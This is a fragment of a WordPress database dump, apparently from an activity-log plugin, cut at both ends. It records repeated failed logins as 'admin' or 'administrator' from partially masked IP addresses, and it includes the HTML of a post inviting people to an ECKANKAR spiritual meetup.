'),(232980,39521,'_message_key','user_unknown_login_failed'),(232981,39521,'_server_remote_addr','20.163.25.x'),(232982,39522,'failed_username','administrator'),(232983,39522,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(232984,39522,'_message_key','user_unknown_login_failed'),(232985,39522,'_server_remote_addr','107.189.3.x'),(232986,39523,'failed_username','admin'),(232987,39523,'server_http_user_agent','Mozilla/5.0'),(232988,39523,'_message_key','user_unknown_login_failed'),(232989,39523,'_server_remote_addr','20.38.46.x'),(232990,39524,'failed_username','administrator'),(232991,39524,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(232992,39524,'_message_key','user_unknown_login_failed'),(232993,39524,'_server_remote_addr','104.244.72.x'),(232994,39525,'failed_username','admin'),(232995,39525,'server_http_user_agent','Mozilla/5.0'),(232996,39525,'_message_key','user_unknown_login_failed'),(232997,39525,'_server_remote_addr','20.38.46.x'),(232998,39526,'failed_username','admin'),(232999,39526,'server_http_user_agent','Mozilla/5.0'),(233000,39526,'_message_key','user_unknown_login_failed'),(233001,39526,'_server_remote_addr','20.38.46.x'),(235049,39892,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<strong><span style=\"font-size: 14pt;\">\"<em>Do one thing each day for love alone. Don\'t expect any kind of reward.</em>\"</span></strong><br>\r\n<span style=\"font-size: 14pt;\">Stories to Help You See God In Your Life: The Book of ECK Parables,</span><br>\r\n<span style=\"font-size: 14pt;\">Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(232892,39499,'_server_remote_addr','20.168.9.x'),(232893,39500,'failed_username','admin'),(232894,39500,'server_http_user_agent','Mozilla/5.0'),(232891,39499,'_message_key','user_unknown_login_failed'),(232890,39499,'server_http_user_agent','Mozilla/5.0'),(232889,39499,'failed_username','admin'),(232888,39498,'_server_remote_addr','20.38.46.x'),(232887,39498,'_message_key','user_unknown_login_failed'),(232886,39498,'server_http_user_agent','Mozilla/5.0'),(232885,39498,'failed_username','admin'),(232884,39497,'_server_remote_addr','20.163.25.x'),(232883,39497,'_message_key','user_unknown_login_failed'),(232872,39494,'_server_remote_addr','20.163.25.x'),(232873,39495,'failed_username','admin'),(232874,39495,'server_http_user_agent','Mozilla/5.0'),(232875,39495,'_message_key','user_unknown_login_failed'),(232876,39495,'_server_remote_addr','20.38.46.x'),(232877,39496,'failed_username','admin'),(232878,39496,'server_http_user_agent','Mozilla/5.0'),(232879,39496,'_message_key','user_unknown_login_failed'),(232880,39496,'_server_remote_addr','20.168.9.x'),(232881,39497,'failed_username','admin'),(232882,39497,'server_http_user_agent','Mozilla/5.0'),(232819,39481,'_message_key','user_unknown_login_failed'),(232820,39481,'_server_remote_addr','20.38.46.x'),(232821,39482,'failed_username','admin'),(232822,39482,'server_http_user_agent','Mozilla/5.0'),(232823,39482,'_message_key','user_unknown_login_failed'),(232824,39482,'_server_remote_addr','20.163.25.x'),(232825,39483,'failed_username','admin'),(232826,39483,'server_http_user_agent','Mozilla/5.0'),(232827,39483,'_message_key','user_unknown_login_failed'),(232828,39483,'_server_remote_addr','20.168.9.x'),(232829,39484,'failed_username','admin'),(232830,39484,'server_http_user_agent','Mozilla/5.0'),(232831,39484,'_message_key','user_unknown_login_failed'),(232832,39484,'_server_remote_addr','20.38.46.x'),(232833,39485,'failed_username','admin'),(232834,39485,'server_http_user_agent','Mozilla/5.0'),(232835,39485,'_message_key','user_unknown_login_failed'),(232836,39485,'_server_remote_addr','20.168.9.x'),(232837,39486,'failed_username','admin'),(232838,39486,'server_http_user_agent','Mozilla/5.0'),(232839,39486,'_message_key','user_unknown_login_failed'),(232840,39486,'_server_remote_addr','20.163.25.x'),(232841,39487,'failed_username','admin'),(232842,39487,'server_http_user_agent','Mozilla/5.0'),(232843,39487,'_message_key','user_unknown_login_failed'),(232844,39487,'_server_remote_addr','20.38.46.x'),(232845,39488,'failed_username','admin'),(232846,39488,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(232847,39488,'_message_key','user_unknown_login_failed'),(232848,39488,'_server_remote_addr','86.107.198.x'),(232849,39489,'failed_username','admin'),(232850,39489,'server_http_user_agent','Mozilla/5.0'),(232851,39489,'_message_key','user_unknown_login_failed'),(232852,39489,'_server_remote_addr','20.168.9.x'),(232853,39490,'failed_username','admin'),(232854,39490,'server_http_user_agent','Mozilla/5.0'),(232855,39490,'_message_key','user_unknown_login_failed'),(232856,39490,'_server_remote_addr','20.163.25.x'),(232857,39491,'failed_username','wadminw'),(232858,39491,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(232859,39491,'_message_key','user_unknown_login_failed'),(232860,39491,'_server_remote_addr','91.238.164.x'),(232861,39492,'failed_username','admin'),(232862,39492,'server_http_user_agent','Mozilla/5.0'),(232863,39492,'_message_key','user_unknown_login_failed'),(232864,39492,'_server_remote_addr','20.38.46.x'),(232865,39493,'failed_username','admin'),(232866,39493,'server_http_user_agent','Mozilla/5.0'),(232867,39493,'_message_key','user_unknown_login_failed'),(232868,39493,'_server_remote_addr','20.168.9.x'),(232869,39494,'failed_username','admin'),(232870,39494,'server_http_user_agent','Mozilla/5.0'),(232871,39494,'_message_key','user_unknown_login_failed'),(232818,39481,'server_http_user_agent','Mozilla/5.0'),(232817,39481,'failed_username','admin'),(232816,39480,'_server_remote_addr','20.163.25.x'),(232814,39480,'server_http_user_agent','Mozilla/5.0'),(232815,39480,'_message_key','user_unknown_login_failed'),(232812,39479,'_server_remote_addr','20.168.9.x'),(232813,39480,'failed_username','admin'),(232811,39479,'_message_key','user_unknown_login_failed'),(232810,39479,'server_http_user_agent','Mozilla/5.0'),(232809,39479,'failed_username','admin'),(232808,39478,'_server_remote_addr','20.38.46.x'),(232807,39478,'_message_key','user_unknown_login_failed'),(232804,39477,'_server_remote_addr','149.91.122.x'),(232805,39478,'failed_username','admin'),(232806,39478,'server_http_user_agent','Mozilla/5.0'),(232803,39477,'_message_key','user_unknown_login_failed'),(232802,39477,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(232786,39473,'server_http_user_agent','Mozilla/5.0'),(232787,39473,'_message_key','user_unknown_login_failed'),(232788,39473,'_server_remote_addr','20.163.25.x'),(232789,39474,'failed_username','admin'),(232790,39474,'server_http_user_agent','Mozilla/5.0'),(232791,39474,'_message_key','user_unknown_login_failed'),(232792,39474,'_server_remote_addr','20.38.46.x'),(232793,39475,'failed_username','admin'),(232794,39475,'server_http_user_agent','Mozilla/5.0'),(232795,39475,'_message_key','user_unknown_login_failed'),(232796,39475,'_server_remote_addr','20.168.9.x'),(232797,39476,'failed_username','admin'),(232798,39476,'server_http_user_agent','Mozilla/5.0'),(232799,39476,'_message_key','user_unknown_login_failed'),(232800,39476,'_server_remote_addr','20.163.25.x'),(232801,39477,'failed_username','admin'),(232770,39469,'server_http_user_agent','Mozilla/5.0'),(232771,39469,'_message_key','user_unknown_login_failed'),(232772,39469,'_server_remote_addr','20.168.6.x'),(232773,39470,'failed_username','administrator'),(232774,39470,'server_http_user_agent','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(232775,39470,'_message_key','user_unknown_login_failed'),(232776,39470,'_server_remote_addr','107.189.11.x'),(232777,39471,'failed_username','admin'),(232778,39471,'server_http_user_agent','Mozilla/5.0'),(232779,39471,'_message_key','user_unknown_login_failed'),(232780,39471,'_server_remote_addr','20.38.46.x'),(232781,39472,'failed_username','admin'),(232782,39472,'server_http_user_agent','Mozilla/5.0'),(232783,39472,'_message_key','user_unknown_login_failed'),(232784,39472,'_server_remote_addr','20.168.9.x'),(232785,39473,'failed_username','admin'),(232769,39469,'failed_username','admin'),(232768,39468,'_server_remote_addr','20.168.9.x'),(232767,39468,'_message_key','user_unknown_login_failed'),(232765,39468,'failed_username','admin'),(232766,39468,'server_http_user_agent','Mozilla/5.0'),(232763,39467,'_message_key','user_unknown_login_failed'),(232764,39467,'_server_remote_addr','20.163.25.x'),(232762,39467,'server_http_user_agent','Mozilla/5.0'),(232761,39467,'failed_username','admin'),(232760,39466,'_server_remote_addr','20.38.46.x'),(232759,39466,'_message_key','user_unknown_login_failed'),(232758,39466,'server_http_user_agent','Mozilla/5.0'),(232757,39466,'failed_username','admin'),(232756,39465,'_server_remote_addr','20.168.9.x'),(232755,39465,'_message_key','user_unknown_login_failed'),(232754,39465,'server_http_user_agent','Mozilla/5.0'),(232752,39464,'_server_remote_addr','20.38.46.x'),(232753,39465,'failed_username','admin'),(232750,39464,'server_http_user_agent','Mozilla/5.0'),(232751,39464,'_message_key','user_unknown_login_failed'),(232749,39464,'failed_username','admin'),(232746,39463,'server_http_user_agent','Mozilla/5.0'),(232747,39463,'_message_key','user_unknown_login_failed'),(232748,39463,'_server_remote_addr','20.163.25.x'),(232745,39463,'failed_username','admin'),(232744,39462,'_server_remote_addr','20.168.6.x'),(232743,39462,'_message_key','user_unknown_login_failed'),(232718,39456,'server_http_user_agent','Mozilla/5.0'),(232719,39456,'_message_key','user_unknown_login_failed'),(232720,39456,'_server_remote_addr','20.38.46.x'),(232721,39457,'failed_username','admin'),(232722,39457,'server_http_user_agent','Mozilla/5.0'),(232723,39457,'_message_key','user_unknown_login_failed'),(232724,39457,'_server_remote_addr','20.168.6.x'),(232725,39458,'failed_username','admin'),(232726,39458,'server_http_user_agent','Mozilla/5.0'),(232727,39458,'_message_key','user_unknown_login_failed'),(232728,39458,'_server_remote_addr','20.163.25.x'),(232729,39459,'failed_username','admin'),(232730,39459,'server_http_user_agent','Mozilla/5.0'),(232731,39459,'_message_key','user_unknown_login_failed'),(232732,39459,'_server_remote_addr','20.168.9.x'),(232733,39460,'failed_username','admin'),(232734,39460,'server_http_user_agent','Mozilla/5.0'),(232735,39460,'_message_key','user_unknown_login_failed'),(232736,39460,'_server_remote_addr','20.38.46.x'),(232737,39461,'failed_username','admin'),(232738,39461,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(232739,39461,'_message_key','user_unknown_login_failed'),(232740,39461,'_server_remote_addr','178.63.77.x'),(232741,39462,'failed_username','admin'),(232742,39462,'server_http_user_agent','Mozilla/5.0'),(232717,39456,'failed_username','admin'),(232716,39455,'_server_remote_addr','20.168.9.x'),(232715,39455,'_message_key','user_unknown_login_failed'),(232714,39455,'server_http_user_agent','Mozilla/5.0'),(232713,39455,'failed_username','admin'),(232712,39454,'_server_remote_addr','20.163.25.x'),(232711,39454,'_message_key','user_unknown_login_failed'),(232710,39454,'server_http_user_agent','Mozilla/5.0'),(232709,39454,'failed_username','admin'),(232708,39453,'_server_remote_addr','20.38.46.x'),(232707,39453,'_message_key','user_unknown_login_failed'),(232706,39453,'server_http_user_agent','Mozilla/5.0'),(232705,39453,'failed_username','admin'),(232703,39452,'_message_key','user_unknown_login_failed'),(232704,39452,'_server_remote_addr','20.168.6.x'),(232702,39452,'server_http_user_agent','Mozilla/5.0'),(232700,39451,'_server_remote_addr','20.168.9.x'),(232701,39452,'failed_username','admin'),(232699,39451,'_message_key','user_unknown_login_failed'),(232698,39451,'server_http_user_agent','Mozilla/5.0'),(232697,39451,'failed_username','admin'),(232696,39450,'_server_remote_addr','20.163.25.x'),(232695,39450,'_message_key','user_unknown_login_failed'),(232694,39450,'server_http_user_agent','Mozilla/5.0'),(232693,39450,'failed_username','admin'),(232692,39449,'_server_remote_addr','20.38.46.x'),(232691,39449,'_message_key','user_unknown_login_failed'),(232677,39446,'failed_username','admin'),(232678,39446,'server_http_user_agent','Mozilla/5.0'),(232679,39446,'_message_key','user_unknown_login_failed'),(232680,39446,'_server_remote_addr','20.163.25.x'),(232681,39447,'failed_username','admin'),(232682,39447,'server_http_user_agent','Mozilla/5.0'),(232683,39447,'_message_key','user_unknown_login_failed'),(232684,39447,'_server_remote_addr','20.168.9.x'),(232685,39448,'failed_username','admin'),(232686,39448,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(232687,39448,'_message_key','user_unknown_login_failed'),(232688,39448,'_server_remote_addr','139.59.26.x'),(232689,39449,'failed_username','admin'),(232690,39449,'server_http_user_agent','Mozilla/5.0'),(232676,39445,'_server_remote_addr','20.168.6.x'),(232675,39445,'_message_key','user_unknown_login_failed'),(232673,39445,'failed_username','admin'),(232674,39445,'server_http_user_agent','Mozilla/5.0'),(232631,39434,'_message_key','user_unknown_login_failed'),(232632,39434,'_server_remote_addr','20.168.6.x'),(232633,39435,'failed_username','admin'),(232634,39435,'server_http_user_agent','Mozilla/5.0'),(232635,39435,'_message_key','user_unknown_login_failed'),(232636,39435,'_server_remote_addr','20.163.25.x'),(232637,39436,'failed_username','admin'),(232638,39436,'server_http_user_agent','Mozilla/5.0'),(232639,39436,'_message_key','user_unknown_login_failed'),(232640,39436,'_server_remote_addr','20.168.9.x'),(232641,39437,'failed_username','admin'),(232642,39437,'server_http_user_agent','Mozilla/5.0'),(232643,39437,'_message_key','user_unknown_login_failed'),(232644,39437,'_server_remote_addr','20.38.46.x'),(232645,39438,'failed_username','admin'),(232646,39438,'server_http_user_agent','Mozilla/5.0'),(232647,39438,'_message_key','user_unknown_login_failed'),(232648,39438,'_server_remote_addr','20.163.25.x'),(232649,39439,'failed_username','admin'),(232650,39439,'server_http_user_agent','Mozilla/5.0'),(232651,39439,'_message_key','user_unknown_login_failed'),(232652,39439,'_server_remote_addr','20.168.9.x'),(232653,39440,'failed_username','admin'),(232654,39440,'server_http_user_agent','Mozilla/5.0'),(232655,39440,'_message_key','user_unknown_login_failed'),(232656,39440,'_server_remote_addr','20.168.6.x'),(232657,39441,'failed_username','admin'),(232658,39441,'server_http_user_agent','Mozilla/5.0'),(232659,39441,'_message_key','user_unknown_login_failed'),(232660,39441,'_server_remote_addr','20.38.46.x'),(232661,39442,'failed_username','admin'),(232662,39442,'server_http_user_agent','Mozilla/5.0'),(232663,39442,'_message_key','user_unknown_login_failed'),(232664,39442,'_server_remote_addr','20.163.25.x'),(232665,39443,'failed_username','admin'),(232666,39443,'server_http_user_agent','Mozilla/5.0'),(232667,39443,'_message_key','user_unknown_login_failed'),(232668,39443,'_server_remote_addr','20.168.9.x'),(232669,39444,'failed_username','admin'),(232670,39444,'server_http_user_agent','Mozilla/5.0'),(232671,39444,'_message_key','user_unknown_login_failed'),(232672,39444,'_server_remote_addr','20.38.46.x'),(232573,39420,'failed_username','admin'),(232574,39420,'server_http_user_agent','Mozilla/5.0'),(232575,39420,'_message_key','user_unknown_login_failed'),(232576,39420,'_server_remote_addr','20.38.46.x'),(232577,39421,'failed_username','admin'),(232578,39421,'server_http_user_agent','Mozilla/5.0'),(232579,39421,'_message_key','user_unknown_login_failed'),(232580,39421,'_server_remote_addr','20.163.25.x'),(232581,39422,'failed_username','admin'),(232582,39422,'server_http_user_agent','Mozilla/5.0'),(232583,39422,'_message_key','user_unknown_login_failed'),(232584,39422,'_server_remote_addr','20.163.25.x'),(232585,39423,'failed_username','admin'),(232586,39423,'server_http_user_agent','Mozilla/5.0'),(232587,39423,'_message_key','user_unknown_login_failed'),(232588,39423,'_server_remote_addr','20.168.9.x'),(232589,39424,'failed_username','admin'),(232590,39424,'server_http_user_agent','Mozilla/5.0'),(232591,39424,'_message_key','user_unknown_login_failed'),(232592,39424,'_server_remote_addr','20.168.6.x'),(232593,39425,'failed_username','admin'),(232594,39425,'server_http_user_agent','Mozilla/5.0'),(232595,39425,'_message_key','user_unknown_login_failed'),(232596,39425,'_server_remote_addr','20.38.46.x'),(232597,39426,'failed_username','admin'),(232598,39426,'server_http_user_agent','Mozilla/5.0'),(232599,39426,'_message_key','user_unknown_login_failed'),(232600,39426,'_server_remote_addr','20.163.25.x'),(232601,39427,'failed_username','admin'),(232602,39427,'server_http_user_agent','Mozilla/5.0'),(232603,39427,'_message_key','user_unknown_login_failed'),(232604,39427,'_server_remote_addr','20.38.46.x'),(232605,39428,'failed_username','admin'),(232606,39428,'server_http_user_agent','Mozilla/5.0'),(232607,39428,'_message_key','user_unknown_login_failed'),(232608,39428,'_server_remote_addr','20.168.9.x'),(232609,39429,'failed_username','admin'),(232610,39429,'server_http_user_agent','Mozilla/5.0'),(232611,39429,'_message_key','user_unknown_login_failed'),(232612,39429,'_server_remote_addr','20.168.6.x'),(232613,39430,'failed_username','admin'),(232614,39430,'server_http_user_agent','Mozilla/5.0'),(232615,39430,'_message_key','user_unknown_login_failed'),(232616,39430,'_server_remote_addr','20.163.25.x'),(232617,39431,'failed_username','admin'),(232618,39431,'server_http_user_agent','Mozilla/5.0'),(232619,39431,'_message_key','user_unknown_login_failed'),(232620,39431,'_server_remote_addr','20.38.46.x'),(232621,39432,'failed_username','admin'),(232622,39432,'server_http_user_agent','Mozilla/5.0'),(232623,39432,'_message_key','user_unknown_login_failed'),(232624,39432,'_server_remote_addr','20.168.9.x'),(232625,39433,'failed_username','admin'),(232626,39433,'server_http_user_agent','Mozilla/5.0'),(232627,39433,'_message_key','user_unknown_login_failed'),(232628,39433,'_server_remote_addr','20.38.46.x'),(232629,39434,'failed_username','admin'),(232630,39434,'server_http_user_agent','Mozilla/5.0'),(232535,39410,'_message_key','user_unknown_login_failed'),(232536,39410,'_server_remote_addr','20.168.9.x'),(232537,39411,'failed_username','admin'),(232538,39411,'server_http_user_agent','Mozilla/5.0'),(232539,39411,'_message_key','user_unknown_login_failed'),(232540,39411,'_server_remote_addr','20.168.6.x'),(232541,39412,'failed_username','admin'),(232542,39412,'server_http_user_agent','Mozilla/5.0'),(232543,39412,'_message_key','user_unknown_login_failed'),(232544,39412,'_server_remote_addr','20.163.25.x'),(232545,39413,'failed_username','admin'),(232546,39413,'server_http_user_agent','Mozilla/5.0'),(232547,39413,'_message_key','user_unknown_login_failed'),(232548,39413,'_server_remote_addr','20.38.46.x'),(232549,39414,'failed_username','admin'),(232550,39414,'server_http_user_agent','Mozilla/5.0'),(232551,39414,'_message_key','user_unknown_login_failed'),(232552,39414,'_server_remote_addr','20.168.9.x'),(232553,39415,'failed_username','admin'),(232554,39415,'server_http_user_agent','Mozilla/5.0'),(232555,39415,'_message_key','user_unknown_login_failed'),(232556,39415,'_server_remote_addr','20.38.46.x'),(232557,39416,'failed_username','admin'),(232558,39416,'server_http_user_agent','Mozilla/5.0'),(232559,39416,'_message_key','user_unknown_login_failed'),(232560,39416,'_server_remote_addr','20.163.25.x'),(232561,39417,'failed_username','admin'),(232562,39417,'server_http_user_agent','Mozilla/5.0'),(232563,39417,'_message_key','user_unknown_login_failed'),(232564,39417,'_server_remote_addr','20.168.6.x'),(232565,39418,'failed_username','admin'),(232566,39418,'server_http_user_agent','Mozilla/5.0'),(232567,39418,'_message_key','user_unknown_login_failed'),(232568,39418,'_server_remote_addr','20.168.9.x'),(232569,39419,'failed_username','admin'),(232570,39419,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(232571,39419,'_message_key','user_unknown_login_failed'),(232572,39419,'_server_remote_addr','67.205.12.x'),(232455,39390,'_message_key','user_unknown_login_failed'),(232456,39390,'_server_remote_addr','20.163.25.x'),(232457,39391,'failed_username','admin'),(232458,39391,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(232459,39391,'_message_key','user_unknown_login_failed'),(232460,39391,'_server_remote_addr','82.180.138.x'),(232461,39392,'failed_username','admin'),(232462,39392,'server_http_user_agent','Mozilla/5.0'),(232463,39392,'_message_key','user_unknown_login_failed'),(232464,39392,'_server_remote_addr','20.168.6.x'),(232465,39393,'failed_username','admin'),(232466,39393,'server_http_user_agent','Mozilla/5.0'),(232467,39393,'_message_key','user_unknown_login_failed'),(232468,39393,'_server_remote_addr','20.168.9.x'),(232469,39394,'failed_username','admin'),(232470,39394,'server_http_user_agent','Mozilla/5.0'),(232471,39394,'_message_key','user_unknown_login_failed'),(232472,39394,'_server_remote_addr','20.38.46.x'),(232473,39395,'failed_username','admin'),(232474,39395,'server_http_user_agent','Mozilla/5.0'),(232475,39395,'_message_key','user_unknown_login_failed'),(232476,39395,'_server_remote_addr','20.163.25.x'),(232477,39396,'failed_username','admin'),(232478,39396,'server_http_user_agent','Mozilla/5.0'),(232479,39396,'_message_key','user_unknown_login_failed'),(232480,39396,'_server_remote_addr','20.168.9.x'),(232481,39397,'failed_username','admin'),(232482,39397,'server_http_user_agent','Mozilla/5.0'),(232483,39397,'_message_key','user_unknown_login_failed'),(232484,39397,'_server_remote_addr','20.38.46.x'),(232485,39398,'failed_username','admin'),(232486,39398,'server_http_user_agent','Mozilla/5.0'),(232487,39398,'_message_key','user_unknown_login_failed'),(232488,39398,'_server_remote_addr','20.168.6.x'),(232489,39399,'failed_username','admin'),(232490,39399,'server_http_user_agent','Mozilla/5.0'),(232491,39399,'_message_key','user_unknown_login_failed'),(232492,39399,'_server_remote_addr','20.163.25.x'),(232493,39400,'failed_username','admin'),(232494,39400,'server_http_user_agent','Mozilla/5.0'),(232495,39400,'_message_key','user_unknown_login_failed'),(232496,39400,'_server_remote_addr','20.38.46.x'),(232497,39401,'failed_username','admin'),(232498,39401,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(232499,39401,'_message_key','user_unknown_login_failed'),(232500,39401,'_server_remote_addr','199.195.250.x'),(232501,39402,'failed_username','admin'),(232502,39402,'server_http_user_agent','Mozilla/5.0'),(232503,39402,'_message_key','user_unknown_login_failed'),(232504,39402,'_server_remote_addr','20.168.9.x'),(232505,39403,'failed_username','admin'),(232506,39403,'server_http_user_agent','Mozilla/5.0'),(232507,39403,'_message_key','user_unknown_login_failed'),(232508,39403,'_server_remote_addr','20.163.25.x'),(232509,39404,'failed_username','admin'),(232510,39404,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(232511,39404,'_message_key','user_unknown_login_failed'),(232512,39404,'_server_remote_addr','146.190.71.x'),(232513,39405,'failed_username','admin'),(232514,39405,'server_http_user_agent','Mozilla/5.0'),(232515,39405,'_message_key','user_unknown_login_failed'),(232516,39405,'_server_remote_addr','20.38.46.x'),(232517,39406,'failed_username','admin'),(232518,39406,'server_http_user_agent','Mozilla/5.0'),(232519,39406,'_message_key','user_unknown_login_failed'),(232520,39406,'_server_remote_addr','20.168.6.x'),(232521,39407,'failed_username','admin'),(232522,39407,'server_http_user_agent','Mozilla/5.0'),(232523,39407,'_message_key','user_unknown_login_failed'),(232524,39407,'_server_remote_addr','20.168.9.x'),(232525,39408,'failed_username','admin'),(232526,39408,'server_http_user_agent','Mozilla/5.0'),(232527,39408,'_message_key','user_unknown_login_failed'),(232528,39408,'_server_remote_addr','20.163.25.x'),(232529,39409,'failed_username','admin'),(232530,39409,'server_http_user_agent','Mozilla/5.0'),(232531,39409,'_message_key','user_unknown_login_failed'),(232532,39409,'_server_remote_addr','20.38.46.x'),(232533,39410,'failed_username','admin'),(232534,39410,'server_http_user_agent','Mozilla/5.0'),(232266,39345,'_message_key','user_unknown_login_failed'),(232267,39345,'_server_remote_addr','20.168.6.x'),(232268,39346,'failed_username','admin'),(232269,39346,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(232270,39346,'_message_key','user_unknown_login_failed'),(232271,39346,'_xmlrpc_request','true'),(232272,39346,'_server_remote_addr','20.168.9.x'),(232273,39347,'failed_username','admin'),(232274,39347,'server_http_user_agent','Mozilla/5.0'),(232275,39347,'_message_key','user_unknown_login_failed'),(232276,39347,'_server_remote_addr','20.168.6.x'),(232277,39348,'failed_username','admin'),(232278,39348,'server_http_user_agent','Mozilla/5.0'),(232279,39348,'_message_key','user_unknown_login_failed'),(232280,39348,'_server_remote_addr','20.168.6.x'),(232281,39349,'failed_username','administrator'),(232282,39349,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(232283,39349,'_message_key','user_unknown_login_failed'),(232284,39349,'_server_remote_addr','205.185.120.x'),(232285,39350,'failed_username','admin'),(232286,39350,'server_http_user_agent','Mozilla/5.0'),(232287,39350,'_message_key','user_unknown_login_failed'),(232288,39350,'_server_remote_addr','20.168.6.x'),(232289,39351,'failed_username','admin'),(232290,39351,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(232291,39351,'_message_key','user_unknown_login_failed'),(232292,39351,'_server_remote_addr','47.115.50.x'),(232293,39352,'failed_username','admin'),(232294,39352,'server_http_user_agent','Mozilla/5.0'),(232295,39352,'_message_key','user_unknown_login_failed'),(232296,39352,'_server_remote_addr','20.168.6.x'),(232297,39353,'failed_username','admin'),(232298,39353,'server_http_user_agent','Mozilla/5.0'),(232299,39353,'_message_key','user_unknown_login_failed'),(232300,39353,'_server_remote_addr','20.168.6.x'),(232301,39354,'failed_username','admin'),(232302,39354,'server_http_user_agent','Mozilla/5.0'),(232303,39354,'_message_key','user_unknown_login_failed'),(232304,39354,'_server_remote_addr','20.168.9.x'),(232305,39355,'failed_username','admin'),(232306,39355,'server_http_user_agent','Mozilla/5.0'),(232307,39355,'_message_key','user_unknown_login_failed'),(232308,39355,'_server_remote_addr','20.163.25.x'),(232309,39356,'failed_username','admin'),(232310,39356,'server_http_user_agent','Mozilla/5.0'),(232311,39356,'_message_key','user_unknown_login_failed'),(232312,39356,'_server_remote_addr','20.168.9.x'),(232313,39357,'failed_username','admin'),(232314,39357,'server_http_user_agent','Mozilla/5.0'),(232315,39357,'_message_key','user_unknown_login_failed'),(232316,39357,'_server_remote_addr','20.163.25.x'),(232317,39358,'failed_username','admin'),(232318,39358,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(232319,39358,'_message_key','user_unknown_login_failed'),(232320,39358,'_server_remote_addr','150.109.148.x'),(232321,39359,'failed_username','admin'),(232322,39359,'server_http_user_agent','Mozilla/5.0'),(232323,39359,'_message_key','user_unknown_login_failed'),(232324,39359,'_server_remote_addr','20.38.46.x'),(232325,39360,'failed_username','admin'),(232326,39360,'server_http_user_agent','Mozilla/5.0'),(232327,39360,'_message_key','user_unknown_login_failed'),(232328,39360,'_server_remote_addr','20.168.6.x'),(232329,39361,'failed_username','admin'),(232330,39361,'server_http_user_agent','Mozilla/5.0'),(232331,39361,'_message_key','user_unknown_login_failed'),(232332,39361,'_server_remote_addr','20.168.9.x'),(232333,39362,'failed_username','admin'),(232334,39362,'server_http_user_agent','Mozilla/5.0'),(232335,39362,'_message_key','user_unknown_login_failed'),(232336,39362,'_server_remote_addr','20.163.25.x'),(232337,39363,'failed_username','admin'),(232338,39363,'server_http_user_agent','Mozilla/5.0'),(232339,39363,'_message_key','user_unknown_login_failed'),(232340,39363,'_server_remote_addr','20.38.46.x'),(232341,39364,'user_id','2'),(232342,39364,'user_email','nada@zipnadanot.org'),(2